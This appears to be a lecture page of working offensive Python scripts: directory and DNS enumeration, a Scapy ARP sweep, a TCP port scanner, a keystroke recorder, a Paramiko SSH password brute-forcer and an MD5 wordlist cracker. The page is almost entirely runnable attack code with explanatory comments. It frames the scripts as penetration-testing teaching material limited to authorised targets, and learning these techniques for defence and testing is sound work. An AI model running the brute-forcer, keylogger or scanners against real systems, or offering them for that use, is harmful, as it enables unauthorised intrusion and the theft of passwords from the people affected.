Lecture 9 Python Script

This page collects the lecture's Python scripts: two wordlist-driven directory enumerators that treat any non-404 HTTP response as a hit, a DNS-resolution script with an HTTP reachability check, a Scapy ARP sweep of an IP range, a TCP connect() port scanner for a fixed set of ports, a two-line keystroke recorder, a Paramiko SSH password brute-forcer, and a wordlist-based MD5 hash cracker. All of them are offensive tooling; run them only against systems you are authorised to test.


Python script that performs directory enumeration on a

web server using a wordlist


import requests
import sys
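# Wordlist-driven directory enumeration.  The target host comes from
# argv[1]; every wordlist entry is requested as /<entry>.html and anything
# that is not a 404 is reported.  Only run this against hosts you are
# authorised to test.
if len(sys.argv) != 2:
    print("Usage: python script.py <host>")
    sys.exit(1)

# `with` closes the wordlist handle instead of leaving it to the GC.
with open("wordlist.txt") as wordlist_file:
    sub_list = wordlist_file.read()
directories = sub_list.splitlines()

for name in directories:  # `dir` in the original shadowed the builtin
    # argv[1] and the wordlist entry are interpolated unvalidated; a
    # malformed entry just produces a request that fails below.
    dir_enum = f"http://{sys.argv[1]}/{name}.html"
    try:
        # A timeout keeps one unresponsive URL from stalling the whole scan.
        r = requests.get(dir_enum, timeout=5)
    except requests.RequestException as exc:
        # Was an uncaught crash on the first connection error.
        print("Request failed:", dir_enum, exc)
        continue
    # NOTE: "not 404" also counts 301/403/500 and soft-404 pages as hits;
    # check the status code before trusting a reported path.
    if r.status_code != 404:
        print("Valid directory:", dir_enum)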

This script resolves the A records of the base domain given on the command line and then checks whether each result answers over plain HTTP. Despite its name it does not enumerate subdomains: no wordlist, zone transfer or certificate data is consulted, so it only ever reports what the base name itself resolves to.
import dns.resolver
import sys
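def enumerate_subdomains(base_domain):
    """Resolve the A records of *base_domain* and return them as strings.

    Despite the name this does not discover subdomains: it returns only the
    addresses the base name itself resolves to.  An empty list is returned
    when the name does not exist or the lookup yields no usable answer.
    """
    subdomains = []
    try:
        answers = dns.resolver.resolve(base_domain, 'A')
        for rdata in answers:
            # A rdata exposes `.address`, not `.target` (that attribute
            # belongs to CNAME/MX/SRV), so the original raised
            # AttributeError on the first result.  to_text() works for
            # any record type and yields the plain string.
            subdomains.append(rdata.to_text())
    except dns.resolver.NXDOMAIN:
        print(f"No DNS record found for {base_domain}")
    except (dns.resolver.NoAnswer, dns.resolver.NoNameservers,
            dns.exception.Timeout) as exc:
        # A name with no A record, or an unreachable resolver, used to
        # crash the script instead of being reported.
        print(f"DNS lookup failed for {base_domain}: {exc}")
    return subdomains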

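import requests  # used below but missing from this script's imports

if len(sys.argv) != 2:
    print("Usage: python script.py <base_domain>")
    sys.exit(1)

base_domain = sys.argv[1]
subdomains = enumerate_subdomains(base_domain)

for sub in subdomains:
    # Plain HTTP only, so an HTTPS-only host is never reported.
    sub_domain = f"http://{sub}"
    try:
        # Bounded so one black-holed host cannot hang the loop.
        response = requests.get(sub_domain, timeout=5)
        # requests follows redirects, so this is the final status; only a
        # 200 counts as reachable.
        if response.status_code == 200:
            print("Valid domain:", sub_domain)
    except requests.RequestException:
        # Connection errors and timeouts are simply "not reachable".
        pass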

This script is a function-based rewrite of the first one: it enumerates directories by requesting each wordlist entry as /<entry>.html and treating any URL that does not return HTTP 404 as valid.
import requests
import sys

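def enumerate_directories(base_url, directory_list, *, timeout=5, get=None):
    """Return the URLs under *base_url* that do not answer HTTP 404.

    Each entry of *directory_list* is requested as ``<base_url>/<entry>.html``.
    *timeout* bounds every request so one dead URL cannot stall the scan.
    *get* defaults to ``requests.get`` and exists so callers (and tests) can
    substitute any ``get(url, timeout=...)`` callable.  A request that fails
    outright is reported and skipped instead of aborting the whole run.
    """
    if get is None:
        get = requests.get
    valid_directories = []
    for directory in directory_list:
        dir_url = f"{base_url}/{directory}.html"
        try:
            response = get(dir_url, timeout=timeout)
        except requests.RequestException as exc:
            print("Request failed:", dir_url, exc)
            continue
        # NOTE: anything but 404 is treated as a hit, so 403/301/500 and
        # soft-404 pages are listed too; inspect the status before trusting it.
        if response.status_code != 404:
            valid_directories.append(dir_url)
    return valid_directories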

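if len(sys.argv) != 2:
    print("Usage: python script.py <base_url>")
    sys.exit(1)

base_url = sys.argv[1]

# `with` closes the wordlist instead of leaking the handle until GC.
with open("wordlist.txt") as wordlist_file:
    directory_list = wordlist_file.read().splitlines()
valid_directories = enumerate_directories(base_url, directory_list)

for valid_dir in valid_directories:
    print("Valid directory:", valid_dir)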

Scapy to perform an ARP scan within a specified IP range


from scapy.all import *

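import sys

# Interface and target range may be given on the command line
# (`script.py [iface] [cidr]`); the defaults are the original values, and
# "10.10.X.X/24" is a placeholder that must be replaced with a real CIDR.
interface = sys.argv[1] if len(sys.argv) > 1 else "eth0"
ip_range = sys.argv[2] if len(sys.argv) > 2 else "10.10.X.X/24"
broadcastMac = "ff:ff:ff:ff:ff:ff"

# One broadcast ARP who-has frame per address in the range.  Sending raw
# layer-2 frames normally requires root / CAP_NET_RAW.
packet = Ether(dst=broadcastMac) / ARP(pdst=ip_range)

# srp() returns (answered, unanswered) pairs; `inter` paces the sends so
# the burst does not overrun the interface, `timeout` bounds the wait.
ans, unans = srp(packet, timeout=2, iface=interface, inter=0.1)

for send, receive in ans:
    # Responder's MAC and the IP it claims to own.
    print(receive.sprintf(r"%Ether.src% - %ARP.psrc%"))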

Port Scanner
import sys
import socket
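def probeport(ip, port, result=1):
    """Return 0 if a TCP connect to ``(ip, port)`` succeeds, else *result*.

    A 0.5 s timeout bounds each attempt.  Refused, unreachable, timed-out
    and name-resolution failures all count as "not open" and return
    *result*; the socket is always closed, including on those errors (the
    original leaked it whenever an exception fired before ``close()``).
    """
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(0.5)
            # connect_ex returns 0 on success or an errno instead of raising.
            if sock.connect_ex((ip, port)) == 0:
                result = 0
    except OSError:
        # socket.timeout / gaierror are OSError subclasses; treat as closed.
        pass
    return result


# The scanner loop on this page calls `probe_port`; keep both spellings.
probe_port = probeport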

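# Target and port set are defined BEFORE the loop that uses them (the
# original page listed them afterwards, which raises NameError).  The host
# may be overridden as argv[1].
ip = sys.argv[1] if len(sys.argv) > 1 else '192.168.1.6'
open_ports = []

# NetBIOS (137/139), SMB (445), telnet (23), DNS (53), HTTP(S) (80/443),
# MS-RPC (135).  The original also built `range(1, 65535)` and then
# immediately replaced it with this set; a full sweep would be
# `range(1, 65536)` so that 65535 itself is included.
ports = {137, 139, 23, 53, 80, 135, 443, 445}

for port in sorted(ports):
    sys.stdout.flush()
    # The function on this page is spelled `probeport`; it returns 0 for
    # an accepted connect and 1 otherwise.
    if probeport(ip, port) == 0:
        open_ports.append(port)

if open_ports:
    print("Open Ports are: ")
    print(sorted(open_ports))
else:
    print("Looks like no ports are open :(")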

Key Logger
import keyboard
# Records every keystroke delivered to the OS (all windows, not just this
# terminal) until Enter is pressed, then replays them.  `keyboard` hooks the
# input layer, which typically needs root on Linux.  A keystroke recorder
# captures passwords and other secrets: run it only on machines you own or
# are explicitly authorised to test.
keys = keyboard.record(until ='ENTER')
keyboard.play(keys)

bruteforce an SSH server using the Paramiko library in Python


import paramiko

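# Interactive parameters.  input() already returns str, so the str() casts
# were no-ops; stray whitespace from a pasted value is stripped so it cannot
# silently break the connect() or the wordlist open below.
target = input('Please enter target IP address: ').strip()
username = input('Please enter username to bruteforce: ').strip()
password_file = input('Please enter location of the password file: ').strip()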

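def ssh_connect(password):
    """Try one *password* against the module-level *target* as *username*.

    Returns True on success, False when the password is rejected, and None
    when the attempt could not be completed (connection refused, timeout,
    "too many authentication failures"), so the caller can tell a wrong
    password from a password that was never actually tested.
    """
    ssh = paramiko.SSHClient()
    # AutoAddPolicy trusts whatever host key the peer presents, so a
    # man-in-the-middle can harvest every password tried.  Tolerable for a
    # throwaway lab target; pin the expected key for anything else.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        # allow_agent/look_for_keys=False: otherwise paramiko first offers
        # any ssh-agent or ~/.ssh keys, which is slow and can log in with a
        # key while this function reports the current password as the hit.
        # The timeouts stop a black-holed host from hanging the loop.
        ssh.connect(target, port=22, username=username, password=password,
                    allow_agent=False, look_for_keys=False,
                    timeout=10, banner_timeout=10)
        print('Password found: ' + password)
        return True
    except paramiko.AuthenticationException:
        print('Incorrect password: ' + password)
        return False
    except Exception as e:
        # Network errors, server-side rate limiting, etc.; surfaced rather
        # than counted as a wrong password.
        print(e)
        return None
    finally:
        ssh.close()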

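with open(password_file, 'r') as file:
    # Iterate the handle directly instead of readlines(): wordlists can be
    # large and there is no need to hold every line in memory.
    for line in file:
        password = line.strip()
        if ssh_connect(password):
            # SystemExit is a builtin; exit() is the site module's helper
            # and is not guaranteed to exist when run with -S.
            raise SystemExit(0)

print('Password not found in the provided wordlist.')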

script to crack an MD5 hash using a wordlist


import hashlib

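def crack_md5(target_hash, candidates):
    """Return the first candidate whose MD5 hex digest equals *target_hash*.

    *candidates* is an iterable of bytes (raw wordlist lines); surrounding
    whitespace is stripped before hashing, as the original script did.
    *target_hash* is compared after strip().lower(), because hexdigest() is
    lowercase while hashes are frequently pasted in upper case and the
    original's exact comparison then never matched.  Returns None when
    nothing matches.  Unsalted MD5 is not a password hash; this only
    demonstrates a dictionary attack.
    """
    wanted = target_hash.strip().lower()
    for raw in candidates:
        word = raw.strip()
        if hashlib.md5(word).hexdigest() == wanted:
            return word
    return None


if __name__ == "__main__":
    wordlist_location = input('Enter wordlist file location: ')
    hash_input = input('Enter hash to be cracked: ')

    # Binary mode: wordlists routinely contain non-UTF-8 bytes, which abort
    # a text-mode read with UnicodeDecodeError; for valid UTF-8 the hashed
    # bytes are identical to the original's line.strip().encode().
    with open(wordlist_location, 'rb') as file:
        found = crack_md5(hash_input, file)

    if found is not None:
        print('Found cleartext password! ' + found.decode('utf-8', 'replace'))
        raise SystemExit(0)
    # The original printed nothing at all on a miss.
    print('Hash not found in the provided wordlist.')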
